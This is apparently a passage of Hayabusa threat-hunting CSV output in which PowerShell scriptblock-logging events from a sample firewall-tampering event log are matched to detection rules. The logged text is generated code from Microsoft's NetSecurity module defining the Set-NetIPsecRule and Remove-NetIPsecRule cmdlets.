'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] 